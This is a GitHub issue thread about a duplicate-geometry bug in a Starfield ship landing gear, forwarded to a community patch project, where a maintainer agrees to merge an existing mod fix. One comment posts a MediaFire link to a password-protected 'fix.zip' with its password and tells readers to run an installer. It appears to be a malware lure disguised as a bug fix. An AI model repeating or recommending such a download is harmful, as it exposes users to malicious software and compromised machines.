### ISSUE TITLE
Stroud-Eklund Acculander Landing Gear duplicate geometry

### ISSUE THREAD

**Issue by Dark-Thoughts** [Starfield-Community-Patch/Starfield-Community-Patch#1121]
I'm just forwarding this old mod fix which still has not been fixed by Bethesda. Screenshots and description on the mod page: https://www.nexusmods.com/starfield/mods/4630

### Details

-

### Game Version

1.13.61

### Language

English (EN)

### Have you recreated this issue on a new game?

Yes, I can recreate this issue.

### Reproduction Steps

Just look at the ship module up close.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Deebz96** [comment]
Noticed this one myself. wSkeever seems to no longer mod Starfield, but his fixes have been contributed to the patch before, and that mod has open permissions. We’ll roll it into the next build.

**Comment by Deebz96** [comment]
[SFCP_1121.zip](https://github.com/user-attachments/files/16755153/SFCP_1121.zip)
